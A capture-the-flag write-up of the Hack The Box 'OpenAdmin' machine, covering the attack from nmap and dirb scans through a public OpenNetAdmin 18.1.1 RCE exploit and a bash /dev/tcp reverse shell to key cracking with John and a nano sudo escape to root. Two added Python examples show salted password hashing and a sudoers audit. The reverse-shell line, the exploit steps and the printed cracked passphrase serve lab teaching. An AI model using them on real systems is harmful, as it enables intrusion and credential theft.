I recently completed the OpenAdmin box from Hack The Box. While this box was rated as easy, it was a little tricky to get my footing and work my way around the box.
Command:
nmap -sC -sV -O -T4 -p- -oN nmap.txt 10.10.10.171
Ports Open:
- 22 OpenSSH 7.6p1: the main tool for remote login over SSH. SSH encrypts all the traffic and also provides secure tunneling, plus some other cool things.
- 80 Apache httpd 2.4.29: a free and open-source cross-platform web server. These servers mostly run on Linux, but some of the current/up-to-date ones run on Windows.
Since I like messing around with the website first, I will skip over the first port and head directly over to the site.
So nothing too interesting here for me. Let's fire up some directory busting tools.
Command:
dirb http://10.10.10.171/ -o dirb.txt
- -o = Saves the results to an output file, so you can clear your screen after it runs if you want to.
After some time we should get a pretty long list of directories found.
After getting the results we can now head over to the sites that were discovered. It appears to be some landing pages that don't provide too much information for us.
But after we get to the /music location it appears to be a login section which wasn't on the other sites.
Clicking on the login button should bring up a new page called /ona.
Searching on the page brings up the below User Info page. It shows us as being logged in as a guest and that the database is running on mysqli.
Searching around some more, we are able to find the version information.
v18.1.1
When typing ona v18.1.1 into Google, it provides us with the following.
OpenNetAdmin v18.1.1
OpenNetAdmin provides a database managed inventory of your IP network. Each subnet, host, and IP can be tracked via a centralized AJAX enabled web interface that can help reduce tracking errors. A full CLI interface is available as well to use for scripting and bulk work.
Now that we have this key information let's check for any exploits on Kali that we can use for it.
Command:
searchsploit OpenNetAdmin
Let's go with the last one.
Command:
locate php/webapps/47691.sh
cp /usr/share/exploitdb/exploits/php/webapps/47691.sh .
Command:
cat 47691.sh
The code above will push out a pseudo-shell for us.
Before running the script you will need to convert its line endings to Unix format.
Command:
dos2unix 47691.sh
Command:
./47691.sh 10.10.10.171/ona/
This will bring up a limited shell on the machine. I decided to use another Python script instead, so depending on what you want to do, the option is yours.
Command:
wget https://raw.githubusercontent.com/amriunix/ona-rce/master/ona-rce.py
Let's run the code to read the options:
Command:
python3 ona-rce.py
After running the script we get 2 options: one to check if the victim is vulnerable and another to exploit.
Command:
python3 ona-rce.py check http://10.10.10.171/ona/
Now off to the races.
Command:
python3 ona-rce.py exploit http://10.10.10.171/ona/
So I am the www-data user.
Let's get a better shell on the machine.
Command:
nc -nvlp 1234
Command:
/bin/bash -c 'bash -i >& /dev/tcp/tun0/1234 0>&1'
I am going to check around on the box for any hidden files. While doing this I come across the following 2 users.
After some additional searches on the box I come across the following password for the localhost.
Save these creds to a file.
Now review the file to make sure.
Command:
cat password
Remember that there was an SSH port open before. I am going to try to use the usernames we found with the password we just discovered to log in.
Something should have stuck out to you. When I copied that password to my file I left out the ! by accident. Make sure you are paying close attention to this when you are working on a box.
Now try this again with the !.
Let's look at what is running here.
Command:
netstat -a
We can see that something is listening on localhost:52846.
While looking at this directory, I see a file called main.php.
I tried to cat it, but it didn't show much, so I am going to use curl with the knowledge that netstat showed there is something running here at localhost port 52846.
Command:
curl http://127.0.0.1:52846/main.php
We can see that there is an RSA private key here.
Let's copy and paste this into a new file.
Command:
echo > key
nano key
Then paste the key, press CTRL+X, then Yes to save it.
Verify the contents of the file by running cat on it.
I am going to use John the Ripper to crack this.
But first, if you haven't already unzipped rockyou.txt.gz, do the following.
Command:
cd /usr/share/wordlists
gunzip rockyou.txt.gz
ls  # to verify that it worked
Now let's run John!
Command:
sudo john --wordlist=/usr/share/wordlists/rockyou.txt key
So save this password somewhere for the future: bloodninjas.
Heading back over to the box, I am going to continue to look through what additional files I can find.
Command:
cat index.php
We see that there is another password here, and it looks to be hashed with SHA-512.
Grab this and we will run it through CrackStation to see if it has been cracked.
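Why a lookup service can reverse a hash like this one, and what the application should store instead, shown as an added example that is not code from the box or from the original write-up. It assumes the index.php check is a single unsalted SHA-512 pass; the sample password, the function names and the iteration count are constructed for illustration.

```python
import hashlib
import hmac
import os

ITERATIONS = 210_000  # assumed work factor for PBKDF2-HMAC-SHA512; tune to your hardware


def unsalted_sha512(password):
    # Assumed shape of the check in index.php: one SHA-512 pass, no salt
    return hashlib.sha512(password.encode()).hexdigest()


def new_record(password):
    # Hardened form: random per-user salt plus a deliberately slow KDF
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha512", password.encode(), salt, ITERATIONS)
    return salt, digest


def verify(password, salt, digest):
    candidate = hashlib.pbkdf2_hmac("sha512", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(candidate, digest)  # constant-time comparison


def demo():
    password = "Winter2019!"  # constructed sample, not the password from the box
    # Unsalted: every account with this password stores the same digest, so one
    # precomputed table entry matches all of them.
    same_unsalted = unsalted_sha512(password) == unsalted_sha512(password)
    # Salted: the same password yields unrelated records, so a table would have
    # to be rebuilt per salt, at ITERATIONS hash operations per guess.
    (salt_a, rec_a), (salt_b, rec_b) = new_record(password), new_record(password)
    return {
        "unsalted_digests_match": same_unsalted,
        "salted_records_match": rec_a == rec_b,
        "verify_ok": verify(password, salt_a, rec_a),
        "verify_wrong": verify("winter2019!", salt_b, rec_b),
    }


if __name__ == "__main__":
    print(demo())
```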
Now using the id_rsa file, which should include your RSA key, let's use this and the newly found password to log in as Joanna.
Command:
chmod 600 id_rsa
ssh -i id_rsa joanna@10.10.10.171
input passphrase
Command:
sudo -l
This shows that no password is needed when running /bin/nano /opt/priv.
Head over to GTFOBins and you will see there is a way to spawn a root shell.
Using nano to open the /opt/priv file (/bin/nano /opt/priv), you will now edit it.
Command:
reset; sh 1>&0 2>&0
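From the defender's side, the sudo rule used above is the kind of entry a sudoers audit should catch. The following is an added example, not part of the original write-up: it scans sudoers text for rules that let a user run a shell-capable program. The sample rules (including the reconstructed joanna rule), the short program list and the function name `audit` are assumptions made for illustration.

```python
import re

# Short, constructed subset of programs that can start a shell from inside
# their own interface (GTFOBins documents many more); extend it for real use.
SHELL_CAPABLE = {"nano", "vi", "vim", "less", "more", "man", "awk", "find"}

# Constructed sample. The joanna rule is an assumed reconstruction of the
# `sudo -l` result described in the write-up; the other rules are invented.
SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
backup  ALL=(root) NOPASSWD: /sbin/reboot
joanna  ALL=(ALL) NOPASSWD: /bin/nano /opt/priv
"""

# user  host = (runas) [TAG:] command[, command ...]
RULE = re.compile(r"^(?P<who>\S+)\s+[^\s=]+\s*=\s*(?:\([^)]*\)\s*)?(?P<cmds>.+)$")
TAG = re.compile(r"([A-Z_]+):\s*")


def audit(sudoers_text):
    """Return (user, command, nopasswd) for each rule that runs a shell-capable program."""
    findings = []
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()  # simplification: drops comments and #include lines
        if not line or line.startswith("Defaults") or "_Alias" in line.split()[0]:
            continue
        rule = RULE.match(line)
        if not rule:
            continue
        nopasswd = False
        for spec in rule.group("cmds").split(","):
            spec = spec.strip()
            # A tag such as NOPASSWD: applies to its command and the ones after it.
            while (tag := TAG.match(spec)):
                if tag.group(1) in ("NOPASSWD", "PASSWD"):
                    nopasswd = tag.group(1) == "NOPASSWD"
                spec = spec[tag.end():]
            program = spec.split()[0].rsplit("/", 1)[-1] if spec else ""
            if program in SHELL_CAPABLE:
                findings.append((rule.group("who"), spec, nopasswd))
    return findings


if __name__ == "__main__":
    for user, command, nopasswd in audit(SAMPLE_SUDOERS):
        print(f"{user}: {command} (NOPASSWD={nopasswd}); consider sudoedit for file edits")
```

For a rule like this one, granting `sudoedit /opt/priv` in sudoers allows the same file edit without running the editor itself as root.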